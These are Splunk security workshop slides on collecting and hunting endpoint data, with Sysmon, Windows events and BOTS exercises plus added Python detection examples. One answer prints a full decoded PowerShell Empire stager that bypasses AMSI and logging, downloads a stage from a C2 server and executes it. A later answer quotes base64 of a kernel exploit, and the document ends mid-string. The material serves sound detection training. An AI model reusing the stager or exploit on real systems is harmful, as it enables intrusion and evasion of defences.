Splunking The Endpoint

This document provides information about collecting endpoint data using the Splunk Universal Forwarder. It discusses how the Universal Forwarder can be used to collect a wide range of endpoint data, including logs, processes, registry information, and more. It highlights how endpoint data is critical for security operations and investigations, as it can provide insights into tactics and techniques used by attackers. The document also contains resources for configuring the Universal Forwarder to collect specific Microsoft Windows event logs and system information.

© 2021 SPLUNK INC.


Splunking the Endpoint for Security
Based on BOTS Data

December 2020 | Version 1.1

• The Importance of Endpoint Data
• Filtering? Really?
• The Universal Forwarder
• What Can I Find With Endpoint Logging?
• Endpoint Content Sources

Security Operations Suite Architecture
(Architecture diagram; callout: "Our Focus Today!")

Background for this Workshop

Much of this content is based on the following .conf Sessions by James Brodsky

.conf19 - Splunking the Endpoint V: Hands On with BOTSv4 Data
• https://conf.splunk.com/files/2019/slides/SEC2007.pdf
• https://conf.splunk.com/files/2019/recordings/SEC2007.mp4

.conf18 - Splunking the Endpoint IV: A New Hope
• https://static.rainfocus.com/splunk/splunkconf18/static/staticFile/static_file/SEC1378_SECURITY-BRODSKY_SPLUNKINGTHEENDPOINTIV_FINAL_REDACT.pdf
• https://conf.splunk.com/files/2018/recordings/splunking-the-endpoint-iv-sec1378.mp4

What's an Endpoint? (courtesy McAfee)
(Diagram of endpoint device types, including printers)

The Endpoint Is Important!

• Closest to humans
• Versatile
• Under protected
• Data-rich

And often the weak link

• Closest to humans
• Versatile
• Under protected
• Data-rich

82% of successful breaches involved an endpoint*
*SANS 2018 Endpoint Security Survey

Host/Endpoint: Artifacts and Patterns

• Users
• Processes
• Services
• Drivers
• Files
• Registry
• Hardware
• Memory
• Disk activity
• File monitoring: hash values, integrity checking and alerts, creation or deletion
• Wire Data

• Windows Event Logs: 46% (#1 source by volume)
• UNIX TA: 16%
• Windows Perfmon: 6%
• Windows Registry: 6%
• McAfee EPO: 6%
• Symantec Endpoint: 4%
• Non-Microsoft DNS: 4%
• Carbon Black: 2%
• Crowdstrike: 2%
• Microsoft Sysmon: 1%
(Q1 2019 internal data)

Cisco CSIRT… (Valites/Bollinger, 2019)

Endpoint Info Critical to CIS CSC20 (SANS20)

• 1 Inventory of Authorized & Unauthorized Devices and 2 Inventory of Authorized & Unauthorized Software: log hardware info, running processes/services
• 3 Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers: scripted inputs to check for config issues
• 4 Continuous Vulnerability Assessment & Remediation: evaluate processes/services for vulns
• 5 Controlled Use of Administrative Privileges: look for local use of privileged accounts
• 6 Maintenance, Monitoring & Analysis of Audit Logs: gather Windows events/*nix logs
• 7 Email & Web Browser Protections: find unauthorized web browsers or mail clients
• 8 Malware Defenses: look for malicious services/processes
• 9 Limitation & Control of Network Ports, Protocols and Services: look for malicious ports/protocols
• 13 Data Protection: identify lapses in local encryption
• 14 Controlled Access Based on the Need to Know: identify improper account usage or file access
• 16 Account Monitoring & Control: monitor use of privileged and service accounts

You could do all of that with the Universal Forwarder.

Endpoint Info Critical to Many Detections (screenshot)

MITRE ATT&CK
https://attack.mitre.org/

"knowledge base of adversary tactics and techniques based on real-world observations"

• Originally used by Threat Intelligence analysts to better articulate techniques and tactics used by Nation-State adversaries
• Adopted by SecOps teams to describe attacks
• Endpoint vendors are now using it to evaluate their coverage
  – https://attackevals.mitre.org/

Endpoint data provides insight into adversary tactics and techniques due to the fidelity of the logging.

Understanding the Execution, Persistence, Privilege Escalation and Credential Access tactics, as well as a subset of the Initial Access, Defense Evasion, Discovery, Lateral Movement, Collection and even Exfiltration tactics, will depend on analysis of endpoint events.

MITRE ATT&CK in Security Essentials (screenshot)

Additional Ways to Gather Endpoint Data

• Web Proxy
• NG Endpoint Protection
• Integrity Management
• Whitelisting

The Universal Forwarder
It's More Than You Think

The Splunk Universal Forwarder

• "Free"
• Lightweight
• Secure
• Runs on many versions of Windows, *nix, and macOS/OSX
• Flexible
• Centrally configurable
• Scalable

The UF: It's More Than You Think

• Process/Apps/FIM
• Perfmon
• Registry
• Wire Data
• Scripts
• Logs
• Sysmon

*Including PowerShell!

The Universal Forwarder: Pros and Cons

Pros
• No per-node license
• Fully supported by Splunk
• Lots of success and community help
• Efficient and secure transfer of data
• Efficient distribution of data (if architected properly)
• Less complexity
• Lots of capability besides "just logs"

Cons
• It's an agent
• You must install and maintain it
• It doesn't run on all OS's you may have
• It only sends to Splunk*
• Improperly configured it can impact performance
• It can be used for good…or evil…

Setting the Scene

$whoareyou

Alice Bluebird
Security Analyst, Frothly

User Access Information

Instances – Splunk
• <insert your instances>
• https://ws-ep-1-xxx.ws.o2.splunkit.io
• https://ws-ep-2-xxx.ws.o2.splunkit.io
• https://ws-ep-3-xxx.ws.o2.splunkit.io

Usernames should have been distributed.

Collecting What You Need
Microsoft Specific

(Justin Henderson, SANS 555 Course Author)

Resources - What Can Be Filtered (screenshot)

Hands-On: Windows Event Code Guidance

1. Select the recommenders "Michael Gough" and "NSA".
2. Click on 4688.
3. Set the date range to "Between" 8/1/2019 and 8/3/2019, then run the search.
4. Click "Table Analysis" and select "Recommended Events Table".
5. Select "ALL" recommenders and the "main" index, set the date range to Between August 1-3, 2019, and run it. Which events are we collecting that we "should" be, and from how many hosts?
6. Which events are we collecting that perhaps we should NOT (for security use cases), and from how many hosts?
7. Click "Individual Analyzers" and select "Individual Host Analysis". Set the date range to "Between" 8/1/2019 and 8/3/2019, enter the host "BTUN-L", and run it.

Onboard logs from your "golden image" and analyze!

Challenge Questions

1. (Lookup Overview) Based on the advice of JP-CERT and Huntersforge, how many event codes do these two sources jointly recommend? If we review the recommended event codes, there is a difference of opinion between these entities. Review the top 10 most recommended event codes and provide the event codes that differed between the two organizations.

2. (Other Events Table) Which Windows System event log codes have been seen on at least 10 hosts but are probably not needed, based on data collected between August 1 and 3 from the main index?

3. (Recommended Events Treemap) The Treemap Analysis section of the navigation bar performs the same analysis as the Table Analysis section but displays data in a graphical format. Generate a treemap based on data collected between August 1-3, 2020 that has at least 4 recommenders from all sources and the main index.

What to collect from user endpoints?

▶ Basic
• Windows Event logs
  − Security (set up command process auditing, 4688)
  − System
  − Application
  − PowerShell
  − WindowsUpdateLog (on supported systems)

▶ Intermediate
• Sysmon (with TaySwift or Olaf config + Splunk tweaks)
  − Captures registry instead of Splunk regmon
• PowerShell Module Logging
• PowerShell Script Block Logging
• Scripted Inputs

▶ Advanced/Specific
• Splunk Stream
• Perfmon
• PowerShell Transcription Logs
• AppLocker
• Windows Firewall
• WinPrintMon
• Native USB Auditing

But… you probably can't collect EVERYTHING on every endpoint…

Storage and compute doesn't grow on trees

Case Study #1
BOTS Endpoint Configuration

• Latest (at the time) UF (7.3.x) on every endpoint
• Latest Windows TA with all standard scripted inputs enabled, but none of the "Mon" inputs (regmon, netmon, printmon, etc.)
• Windows Security, System, Application events using Michael Gough's audit config and some filtering on Security events
• Microsoft Sysmon v10 with Olaf Hartong's latest config + some more Splunk filtering tweaks
• Windows PowerShell/Operational log (4103 and 4104 events)
• CB Response with watchlists and five standard threat feeds, as well as netconn and process events
• Splunk Stream collecting DNS, HTTP, TCP, UDP, DHCP and a few other protocols

To gauge ingest levels we look at only Windows Events, Sysmon, scripted TA output, and PowerShell.

What ingest did we see?

Upwards of 50MB per endpoint? Uh oh.

• 4688 = Critical, but Sysmon Event Code 1 can be used instead
• 4673 = Not recommended to collect
• 4689 = Not recommended to collect
• 4663 = Granular object auditing

In general, we had lots of extra stuff.

If we remove those four codes… best case ~6MB a day, worst ~12MB!

Case Study #1: Lessons Learned
BOTS Endpoint Config

If you can at all use Sysmon, do it!
• Much more granular and flexible filtering for process events, file creates
• 4688 is better than nothing

Be ruthless about what event codes you collect
• Collect the ones that meet your use case and are "recommended"

renderXml=true may save you some space
• We used Classic because of some issues we found with filtering. As of May 2020, with the latest Windows TA, renderXml=true is the default and can be left on in most cases… we will go into details a bit later.
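The blacklist side of that advice, as an added inputs.conf fragment that is not from the deck. It keeps the event codes Case Study #1 dropped and assumes an index named security; the Sysmon stanza and the choice to drop EventCode 10 there are illustrative assumptions.

```ini
# inputs.conf on the Universal Forwarder (normally pushed from a deployment server)
[WinEventLog://Security]
disabled = 0
index = security
renderXml = true
current_only = 1
evt_resolve_ad_obj = 0
# Plain event ID list: the codes Case Study #1 found to be bulk with little
# security value. Blacklisted events are dropped on the endpoint, so they cost
# neither bandwidth nor license.
blacklist = 4673,4689,4663
# Add 4688 only on hosts where Sysmon EventCode 1 is collected in its place
# (key=regex form shown for comparison):
# blacklist1 = EventCode="4688"

[WinEventLog://Microsoft-Windows-Sysmon/Operational]
disabled = 0
index = security
renderXml = true
current_only = 1
# EventCode 10 (ProcessAccess) is the noisy one; filter it in the Sysmon XML
# config first and use the forwarder blacklist only as a last resort.
blacklist = 10
```

Check the result with the Recommended Events Table from the hands-on above: the blacklisted codes should disappear from the "collected" column without any of the recommended ones going with them.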

Case Study #2
Large, Fortune 500 company based in the US

• 70,000 Windows endpoints running Carbon Black Response
• cb-event-forwarder to get raw sensor data into Splunk
• COLLECT: process info, network connection info, alerts, watchlists
• NOT COLLECT: file modifications, registry modifications, and module loads: diminishing returns from both a Splunk license and a storage perspective (and if you need to, you can always hunt this stuff in the native tool)

600GB a day (about 8.5MB per endpoint, per day!)

Case Study #3
A Great Example of Filtering!

• 1700 endpoints
• Windows Event logs, Sysmon, some Perfmon, PowerShell
• Approx. 10 MB per Windows endpoint!

What Does Endpoint Collection Nirvana Look Like?

~1MB per hour is a "nirvana" goal.

But realistically, max 2MB per work-hour.

Resources for Examples on Filtering Windows Event Codes…

Version 8.0 of the Windows TA (Splunkbase)

Automine's (David Shpritz's) GitHub and related presentation:
• https://www.aplura.com/assets/pdf/SplunkWindowsEventLogs.pdf
• https://gist.github.com/automine/a3915d5238e2967c8d44b0ebcfb66147

What we used for BOTS
• https://splk.it/conf19-splunk-endpoint

Windows Event Logs

4688
WinEventLog:Security

Please. With command-line auditing.

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing

Warm-Up Question

What types of Windows Event logs do we have on our systems (Security? Application? System? Other?), and how many events do we have for each type?

Hints
• index - botsv3
• sourcetype - wineventlog

Answer
• Security: 46,469
• Application: 719
• System: 482
• Other - PowerShell: 92

Question #1
Events from Other Applications

Different applications can log to the Windows event log. Symantec Anti-virus is doing that in our Splunk instance. Based on that, are any Frothly systems recording security events from Symantec Anti-virus? If they are, what signatures are being recorded and on what systems?

Hints
• Drill into the Windows Application events from our previous search
• Check out the field SourceName to find applications that integrate with the Windows Event logging service
• The Windows Event Message field has loads of information in it

| stats Command (https://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Stats)
• Values (values)
• Group By (by)

| stats values(Message) by host

Answer
Five hosts - BGIST-L, BTUN-L, JWORTOS-L, MKRAEUS-L, PCERF-L

Signatures - Backdoor.PsEmpire, W97M.Empstage

Question #2
Process Execution in Windows

One of the users whose anti-virus did not alert for Backdoor.PsEmpire was the administrator, Bud Stoll. Can we find evidence of PowerShell Empire activity on his system and any network artifacts associated with it?

Hints
• Source - WinEventLog:Security
• The event code for process creation is 4688
• Bud's host is BSTOLL-L
• Look for PowerShell, but you may need to decode it

NOTE: You may need to copy the base64 out of the raw event to get all of the characters!

Decode with CyberChef: https://gchq.github.io/CyberChef/
(Screenshots: "CyberChef: Make it prettier!" and "CyberChef: One last thing!")

The decoded stager (as rendered on the slide, in lower case; statements split one per line):

if($psversiontable.psversion.major -ge 3){$gpf=[ref].assembly.gettype('system.management.automation.utils')."getfie`ld"('cachedgrouppolicysettings','n'+'onpublic,static');if($gpf){$gpc=$gpf.getvalue($null);if($gpc['scriptb'+'locklogging']){$gpc['scriptb'+'locklogging']['enablescriptb'+'locklogging']=0;$gpc['scriptb'+'locklogging']['enablescriptblockinvocationlogging']=0}$val=[collections.generic.dictionary[string,system.object]]::new();$val.add('enablescriptb'+'locklogging',0);$val.add('enablescriptblockinvocationlogging',0);$gpc['hkey_local_machine\software\policies\microsoft\windows\powershell\scriptb'+'locklogging']=$val}else{[scriptblock]."getfie`ld"('signatures','n'+'onpublic,static').setvalue($null,(new-object collections.generic.hashset[string]))}$ref=[ref].assembly.gettype('system.management.automation.amsiutils');$ref.getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true);};
[system.net.servicepointmanager]::expect100continue=0;
$wc=new-object system.net.webclient;
$u='mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; rv:11.0) like gecko';
[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};
$wc.headers.add('user-agent',$u);
$wc.headers.add('user-agent',$u);
$wc.proxy=[system.net.webrequest]::defaultwebproxy;
$wc.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;
$script:proxy = $wc.proxy;
$k=[system.text.encoding]::ascii.getbytes('1ab<yk6z4#+vvu%o5}8&m-9ul~l|>0gp');
$r={$d,$k=$args;$s=0..255;0..255|%{$j=($j+$s[$_]+$k[$_%$k.count])%256;$s[$_],$s[$j]=$s[$j],$s[$_]};$d|%{$i=($i+1)%256;$h=($h+$s[$i])%256;$s[$i],$s[$h]=$s[$h],$s[$i];$_-bxor$s[($s[$i]+$s[$h])%256]}};
$ser=$([text.encoding]::unicode.getstring([convert]::frombase64string('aab0ahqacabzadoalwavadqanqauadcanwauaduamwauadeanwa2adoanaa0adma')));
$t='/admin/get.php';
$wc.headers.add("cookie","pthavgs=bkqxpuod5lpcjyfrc1bxpqq8fwi=");
$data=$wc.downloaddata($ser+$t);
$iv=$data[0..3];
$data=$data[4..$data.length];
-join[char[]](& $r $data ($iv+$k))|iex

The first block disables Script Block Logging and AMSI in the running process before anything else happens; the remainder fetches the stage from $ser+$t with the hard-coded user agent and cookie, RC4-decrypts it with the staging key $k, and executes it with iex.

Question #2
Process Execution in Windows

One of the users whose anti-virus did not alert for Backdoor.PsEmpire was the administrator, Bud Stoll. Can we find evidence of PowerShell Empire activity on his system and any network artifacts associated with it?

Answer
• User agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
• URI: /admin/get.php
• Decoded a substring to find the server: https://45.77.53.176:443

Can We Do This Just Using Splunk?

Yes… but you must use regex (and the Decrypt app for the base64 steps):

index=botsv3 source="wineventlog:security" host=BSTOLL-L EventCode=4688 powershell
| rex field=Process_Command_Line "-((?i)enc|encodedcommand|encode|en)\s\'?(?<base64_command>.*\=?\=?)"
| decrypt field=base64_command atob() emit('b64decrypted')
| rex mode=sed field=b64decrypted "s/\.//g"
| rex field=b64decrypted "(?i)FROMBASE64STRING\(\'(?<nestedb64destination>\w+)\'\)"
| decrypt field=nestedb64destination atob() emit('b64destinationdecrypted')
| rex mode=sed field=b64destinationdecrypted "s/\.\.\./period/g"
| rex mode=sed field=b64destinationdecrypted "s/\.//g"
| rex mode=sed field=b64destinationdecrypted "s/period/./g"
| eval b64decrypted=lower(b64decrypted)
| search b64decrypted="*downloaddata($ser+$t)*"
| table _time,src_user,host,b64destinationdecrypted

Line by line: the first decrypt turns the -enc payload into text; the sed lines remove the "." padding artifacts (the dots left for the null bytes of the UTF-16LE payload), protecting "..." first so that the real dots in the IP address survive; the second decrypt handles the nested base64 that hides the server; and the search on downloaddata($ser+$t) is the Empire indicator.
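The same extraction outside Splunk, as an added Python example that is not part of the workshop. It walks the two base64 layers the way the search above does, but decodes the -enc payload as UTF-16LE directly (so there are no "." artifacts to strip) and captures the nested base64 with a proper base64 alphabet, so the C2 URL comes back whole instead of as a substring. The sample command line is constructed inside the code (with the documentation address 192.0.2.10, not the BOTS server); the pattern names and helper functions are mine.

```python
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the slide's SPL
# rex covers the common spellings and so does this. Unlike the slide's nested
# "\w+" capture, the class below keeps '+', '/' and '=', which are legal base64
# characters, so the second layer decodes whole instead of as a substring.
ENC_SWITCH = re.compile(r"-(?:encodedcommand|encode|enc|en|ec|e)\s+'?([A-Za-z0-9+/=]+)", re.I)
NESTED_B64 = re.compile(r"frombase64string\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.I)
USER_AGENT = re.compile(r"\$u\s*=\s*'([^']+)'", re.I)
URI_PATH = re.compile(r"\$t\s*=\s*'([^']+)'", re.I)


def decode_utf16le_b64(blob: str) -> str:
    """Both layers of the stager are base64 over UTF-16LE ([Text.Encoding]::Unicode)."""
    blob += "=" * (-len(blob) % 4)          # re-pad in case the log line was trimmed
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


def analyse_4688(command_line: str) -> Optional[dict]:
    """Pull the Empire indicators out of one 4688 Process Command Line, or None
    when the process was not launched with an encoded command."""
    m = ENC_SWITCH.search(command_line)
    if not m:
        return None
    script = decode_utf16le_b64(m.group(1))
    nested = NESTED_B64.search(script)
    ua = USER_AGENT.search(script)
    uri = URI_PATH.search(script)
    return {
        "script": script,
        "server": decode_utf16le_b64(nested.group(1)) if nested else None,
        "uri": uri.group(1) if uri else None,
        "user_agent": ua.group(1) if ua else None,
        # the same indicator the slide's search keys on
        "empire_stager": "downloaddata($ser+$t)" in script.lower(),
    }


def build_sample_command_line(server: str = "https://192.0.2.10:443") -> str:
    """Constructed test input, not a BOTS event: a cut-down stager wrapped the
    way the real one is (UTF-16LE base64 behind -enc, with the C2 server hidden
    in a second UTF-16LE base64 layer). 192.0.2.10 is a documentation address."""
    inner = base64.b64encode(server.encode("utf-16-le")).decode()
    script = (
        "$wc=New-Object System.Net.WebClient;"
        "$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';"
        "$wc.Headers.Add('User-Agent',$u);"
        f"$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('{inner}')));"
        "$t='/admin/get.php';"
        "$data=$wc.DownloadData($ser+$t);"
    )
    outer = base64.b64encode(script.encode("utf-16-le")).decode()
    return f"powershell -NoP -sta -NonI -W Hidden -Enc {outer}"


if __name__ == "__main__":
    print(analyse_4688(build_sample_command_line()))
```

Feed it the Process_Command_Line value from the raw event rather than the rendered Message field, for the same reason as the NOTE above: anything that truncates the base64 breaks the decode.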

Microsoft Sysmon Primer

A few blog posts to get you started
• https://www.splunk.com/en_us/blog/tips-and-tricks/monitoring-network-traffic-with-sysmon-and-splunk.html
• https://www.splunk.com/en_us/blog/security/a-salacious-soliloquy-on-sysmon.html

Great Sysmon configurations
• https://github.com/SwiftOnSecurity/sysmon-config
• https://github.com/olafhartong/sysmon-modular

Apps & TAs available on Splunkbase
• Sysmon App for Splunk https://splunkbase.splunk.com/app/3544/

Sysmon increases the fidelity of Microsoft logging; version 11 as of May 2020.

Microsoft Sysmon
It Keeps Getting Better and Better!
https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

If you take nothing else from this workshop....

EventCode 1 from Sysmon

What's in Sysmon? (1/4)
Some of the highlights

Event Code 1: Process creation
• Everything that Windows Event 4688 provides and MORE!
• Logs when a process is created: full command line, parent process, and hash of the image

Event Code 3: Network connection
• Logs TCP/UDP connections on the machine
• Linked to a process through the ProcessId and ProcessGuid fields

Event Code 10: Process accessed
• One process accessing the memory of another process
• Probably too noisy to use unless filtered (e.g. to accesses of lsass.exe)

What's in Sysmon? (2/4)
Some of the highlights

Event Code 11: File creation
• Poor man's FIM
• Logs when a file is created or overwritten; monitor creation of things in autorun locations or with usually suspicious extensions (.bat, .vbs, .ps1, .docm, .xlsm)

Event Codes 12, 13, 14: Registry object create/delete, value set, key/value rename
• More flexible/performant than the registry monitoring built into the UF
• More persistent delivery than the UF due to the event log mechanism

Event Code 15: Alternate Data Stream creation
• Tracks if/when files are created with an ADS that has suspicious content (.bat, .vbs, .ps1, .cmd, etc.)
• Browser drops (Mark Of The Web)

What's in Sysmon? (3/4)
Some of the highlights

Event Codes 17 and 18: Pipe creation and connection
• Sometimes malware uses named pipes for interprocess communication

Event Codes 19, 20, and 21: WMI
• WMI event filter, event consumer, and consumer-to-filter binding activity

For a good example of fairly recent malware using BOTH of these techniques, research the "Nyetya" derivative of Petya/NotPetya/Goldeneye:
http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html

What's in Sysmon? (4/4)
Some of the highlights

Event ID 22: DNSEvent (DNS query)
• Created when a process executes a DNS query, whether the result is successful or fails, cached or not

Event ID 23: FileDelete (a file delete was detected)
• Pretty self-explanatory!

Splunk Add-on for Microsoft Sysmon
• Endpoint CIM compliant
• https://splunkbase.splunk.com/app/1914

Researchers publishing new rulesets for granular detections:
• UAC Bypass - https://github.com/Neo23x0/sigma/blob/master/rules/windows/sysmon/sysmon_uac_bypass_eventvwr.yml
• Chinese/Vietnamese/Iranian keyboard layout connecting to server

Classic or XML?
renderXml=true is the DEFAULT for the Windows TA since 6.0 (applies to both Sysmon and Windows TA…)

inputs.conf file, usually on a Universal Forwarder:

[WinEventLog://Security]
index=security
current_only=1
evt_resolve_ad_obj=0
renderXml=true
disabled=0

Classic or XML?
Why should I consider using renderXml across all endpoints?

PROS to XML
• Usually smaller ingest size
• More efficient indexing
• Gets all the fields
• Preferred according to Microsoft
• Required for WEC/WEF collection to work
• Required for multi-language environments to preserve field names

CONS to XML
• Slower raw search (Classic uses indexed extractions)
• Harder to read

Classic or XML? The language issue (screenshot)

Classic or XML? Keywords? (screenshot)

Sysmon Example: Event Code 3 – Network Connect (screenshot)

Another Sysmon Example: Event Code 1 – Process Creation (screenshot)

Sysmon Configuration

Sysmon can be configured to collect or not collect based upon an XML file that matches against specific fields.

Good resources to start to tune your Sysmon collection:

Sysmon configuration file template with default high-quality event tracing
• https://github.com/SwiftOnSecurity/sysmon-config

A Sysmon configuration repository for everybody to customize
• https://github.com/olafhartong/sysmon-modular

Example Exclusions for EventCode 1 (screenshot)

Example Exclusions for EventCode 2 (screenshot)

SwiftOnSecurity Config in Action
(Screenshots: event volume with network events vs. without network events)

Clever network filtering (the config is chock full of stuff like this)

Sysmon Mapping

Olaf Hartong's Modular Sysmon Config Repository maps Sysmon-reported events to MITRE ATT&CK techniques through the rule name (supported in Sysmon v8 and above).

Hands-On: Microsoft Sysmon

Question #1
Network Connect

FYODOR-L is observed running processes that, based on their network connections, might be considered anomalous for a workstation. Which process(es) appear to be generating odd network traffic?

Hints
• index – botsv3
• sourcetype - xmlwineventlog:microsoft-windows-sysmon/operational (Sysmon)
• EventCode – 3
• Check out the ports!

| stats Command (https://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Stats)
• Distinct Count (dc)
• Values (values)
• Group By (by)

| stats dc(dest_port) as portcount values(dest_port) as ports by host Image user

Answer
Yes, C:\Windows\Temp\hdoor.exe

Ports 135, 139, 21, 22, 3306, 443, 445, 80, 8000, 8080

Based on this, what might we hypothesize that this executable might do?

Question #2
Process Creation

FYODOR-L ran "hdoor.exe" which is communicating on lots of ports. What is it?

What do we need to build this search?
• index – botsv3
• sourcetype - xmlwine ventlog:microsoft-windows-sysmon/operational (Sysmon)
• EventCode – 1
• Host - FYODOR-L
• hdoor.exe
• Pivot to VirusTotal (on the hash from the event) to learn more!

Answer
Appears to be a port scanner that was scanning a block of addresses at Frothly.

Identified on VirusTotal with a different name but is thought to be malicious by 25 detection engines.

Question #3
Try It Yourself!

It looks like FYODOR-L was used to perform some network discovery. What other process was run on this host that may be masquerading as a legitimate process?

Hints
• index – botsv3
• sourcetype - xmlwineventlog:microsoft-windows-sysmon/operational (Sysmon)
• Event Code – 1
• Look for fields that might contain the process executed and group them to see which ones are most frequently seen

Answer
iexeplorer.exe

Others?
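The two Sysmon searches from Question 1 (distinct destination ports per process, the dc(dest_port) stats) and Question 3 (process names masquerading as legitimate binaries), as one added Python example that is not part of the workshop. It parses XML-rendered Sysmon events (renderXml=true) with the standard library; the events are constructed inline from the values the slides mention, KNOWN_BINARIES is a stand-in list, and the edit-distance threshold is an assumption.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict


def _local(tag: str) -> str:
    """Drop the Windows event XML namespace from a tag name."""
    return tag.rsplit("}", 1)[-1]


def parse_sysmon_event(xml_text: str) -> dict:
    """Flatten one XML-rendered Sysmon event into
    {EventID, Computer, <each EventData Name>: value}."""
    ev = {}
    for el in ET.fromstring(xml_text).iter():
        name = _local(el.tag)
        if name == "EventID":
            ev["EventID"] = int(el.text)
        elif name == "Computer":
            ev["Computer"] = el.text
        elif name == "Data" and el.get("Name"):
            ev[el.get("Name")] = el.text or ""
    return ev


def port_fanout(events, min_ports=5):
    """EventCode 3: distinct destination ports per (host, Image, User), the
    counterpart of `| stats dc(dest_port) as portcount values(dest_port) as ports
    by host Image user`, keeping only processes that touched >= min_ports ports."""
    ports = defaultdict(set)
    for ev in events:
        if ev.get("EventID") == 3:
            ports[(ev["Computer"], ev["Image"], ev["User"])].add(int(ev["DestinationPort"]))
    return {key: sorted(p) for key, p in ports.items() if len(p) >= min_ports}


def _levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


# Short stand-in list for the demo; in practice seed it from your golden image.
KNOWN_BINARIES = ("iexplore.exe", "svchost.exe", "lsass.exe", "csrss.exe", "rundll32.exe")


def lookalike_images(events, max_distance=2):
    """EventCode 1: image basenames that are a near-miss of a well-known binary
    (iexeplorer.exe vs iexplore.exe), with how often each one ran."""
    counts = defaultdict(int)
    for ev in events:
        if ev.get("EventID") == 1:
            counts[ev["Image"].rsplit("\\", 1)[-1].lower()] += 1
    hits = {}
    for name, n in counts.items():
        if name in KNOWN_BINARIES:
            continue
        dist, legit = min((_levenshtein(name, k), k) for k in KNOWN_BINARIES)
        if dist <= max_distance:
            hits[name] = {"looks_like": legit, "count": n}
    return hits


def make_event(event_id: int, computer: str, **data) -> str:
    """Constructed sample in the shape of a Sysmon operational-log event."""
    fields = "".join(f"<Data Name='{k}'>{v}</Data>" for k, v in data.items())
    return ("<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System>"
            f"<Provider Name='Microsoft-Windows-Sysmon'/><EventID>{event_id}</EventID>"
            f"<Computer>{computer}</Computer></System><EventData>{fields}</EventData></Event>")


SCANNER = r"C:\Windows\Temp\hdoor.exe"
USER = "FROTHLY\\fyodor"
SAMPLE_XML = (
    [make_event(3, "FYODOR-L", Image=SCANNER, User=USER, DestinationIp="192.168.9.30", DestinationPort=p)
     for p in (21, 22, 80, 135, 139, 443, 445, 3306, 8000, 8080)]
    + [make_event(3, "FYODOR-L", Image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                  User=USER, DestinationIp="203.0.113.5", DestinationPort=443)] * 3
    + [make_event(1, "FYODOR-L", Image=img, User=USER, CommandLine=img) for img in
       [r"C:\windows\temp\unziped\lsof-master\iexeplorer.exe"] * 2
       + [r"C:\Program Files\Internet Explorer\iexplore.exe"]
       + [r"C:\Windows\System32\svchost.exe"] * 3 + [SCANNER]]
)
SAMPLE_EVENTS = [parse_sysmon_event(x) for x in SAMPLE_XML]

if __name__ == "__main__":
    print(port_fanout(SAMPLE_EVENTS))
    print(lookalike_images(SAMPLE_EVENTS))
```

The port threshold does the same job as eyeballing the portcount column: a browser fans out over many destinations but one or two ports, a scanner over many ports. The edit-distance check catches the typosquatted names that a frequency sort only surfaces as "rare".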

Question #4
Try It Yourself!

iexeplorer.exe appears to be suspicious based on the attributes we just talked about. What commands have been issued that reference the iexeplorer.exe process on this host? What makes them peculiar?

Hints
• Start where you left off in the previous question
• Sysmon process creation events contain detail down to the command line
• The table command can help you view events in a tabular layout

Answer
• Some Linux commands
• Calls out to the same internal server (192.168.9.30)

Would anyone want to share specific activities they found that are interesting?

Question #5
Try It Yourself!

The system being referenced in the previous command listing has had something called
“colonel” compiled on it and executed. What is it?

Hints
• Build on our prior search
• Base64 can be decoded using tools like CyberChef (copy/paste) or in Splunk using an app like Decrypt (run the rex command first to extract the encoded string from the command line)

"C:\windows\temp\unziped\lsof-master\iexeplorer.exe" http://192.168.9.30:8080/frothlyinventory/showcase.action "echo


LyoKICogVWJ1bnR1IDE2LjA0LjQga2VybmVsIHByaXYgZXNjCiAqCiAqIGFsbCBjcmVkaXRzIHRvIEBibGVpZGwKICogLSB2bmlrCiAqLwoKLy8gVGVzdGVkIG9uOgovLyA0LjQuMC0xMTYtZ2VuZXJpYyAjMTQwLVVidW50dSBTTVAgTW9uIEZlYiAxMiAyMToyMzowNCBVVEMgMjAxOCB4ODZfNjQKLy
8gaWYgZGlmZmVyZW50IGtlcm5lbCBhZGp1c3QgQ1JFRCBvZmZzZXQgKyBjaGVjayBrZXJuZWwgc3RhY2sgc2l6ZQojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgojaW5jbHVkZSA8dW5pc3RkLmg+CiNpbmNsdWRlIDxlcnJuby5oPgojaW5jbHVkZSA8ZmNudGwuaD4KI2luY2x1
ZGUgPHN0cmluZy5oPgojaW5jbHVkZSA8bGludXgvYnBmLmg+CiNpbmNsdWRlIDxsaW51eC91bmlzdGQuaD4KI2luY2x1ZGUgPHN5cy9tbWFuLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4KI2luY2x1ZGUgPHN5cy91bi5oPgojaW5jbHVkZSA8c3lzL3N0YX
QuaD4KI2luY2x1ZGUgPHN0ZGludC5oPgoKI2RlZmluZSBQSFlTX09GRlNFVCAweGZmZmY4ODAwMDAwMDAwMDAKI2RlZmluZSBDUkVEX09GRlNFVCAweDVmOAojZGVmaW5lIFVJRF9PRkZTRVQgNAojZGVmaW5lIExPR19CVUZfU0laRSA2NTUzNgojZGVmaW5lIFBST0dTSVpFIDMyOAoKa
